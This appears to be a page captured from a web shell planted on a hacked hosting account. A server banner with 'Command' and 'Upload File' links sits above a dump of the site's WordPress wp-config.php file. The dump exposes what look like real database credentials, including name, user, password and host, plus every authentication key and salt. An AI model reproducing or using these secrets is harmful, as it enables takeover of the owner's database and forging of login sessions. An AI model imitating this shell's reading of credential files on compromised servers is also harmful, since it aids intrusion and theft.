|
Server IP : 81.169.145.94 / Your IP : 216.73.216.9 Web Server : Apache/2.4.66 (Unix) System : Linux localhost 4.18.0-553.85.1.el8_10.x86_64 #1 SMP User : ( 3928323) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /mnt/web124/b0/74/58743674/htdocs/STRATO-apps/wordpress_05/app/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dbs9972701' );
/** Database username */
define( 'DB_USER', 'dbu1233283' );
/** Database password */
define( 'DB_PASSWORD', 'DykcFQ4Fk5o1vTA9LntfExKMbI7yipTVmYh' );
/** Database hostname */
define( 'DB_HOST', 'rdbms.strato.de' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'mBlyPrIwiDA46F91SngqqsGeR5rjhtY9WUSNiyLcVFYgZVIb6mZXKQkKE48to0ay');
define('SECURE_AUTH_KEY', 'K80RpqoO6D23ELmgMO3YL7JEmXoZQzbhJUvOZ9Ru79IAKlJYS5lhUizili5Xk56j');
define('LOGGED_IN_KEY', '2TkdhjwS8afRpuhpk0g9310QKUmCND2DllDLPARFtgnOisudkcjBSyOGphMF8Glm');
define('NONCE_KEY', 'HTpcjOY4M3BnVXJWb25uXUwq0VUYqmQbuJNthfOmn4iYER7md9XupCJMyM508jlx');
define('AUTH_SALT', '1NPaK6uSSaULZ9oDmmhc26pgP11XR7RQVBGFT2HrzFwqJoaygV8vtjgNRd5lGjUn');
define('SECURE_AUTH_SALT', 'M0jt2MxmlOvaFsOA0hgI9G2VZVSiVP26nQ8Mi8tMfuJ8CYcH6C7mntJkH3CB5Up7');
define('LOGGED_IN_SALT', 'CPhWQWVhtDywckny3bMFlEIJ10boaieA1sD04uQ2iQSwVEBZPIKe2Nc3cf1LAzyg');
define('NONCE_SALT', 'dZctlqLw0y4XfQTHoEfjlPhhvqfO9hOXomnlNv2oxcY6dxRBkNeS4QCvp1gYovoz');
/**
* Other customizations.
*/
define('FS_METHOD','direct');
define('FS_CHMOD_DIR',0755);
define('FS_CHMOD_FILE',0644);
define('WP_TEMP_DIR',dirname(__FILE__).'/wp-content/uploads');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'ylzh_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
define( "WP_AUTO_UPDATE_CORE", true );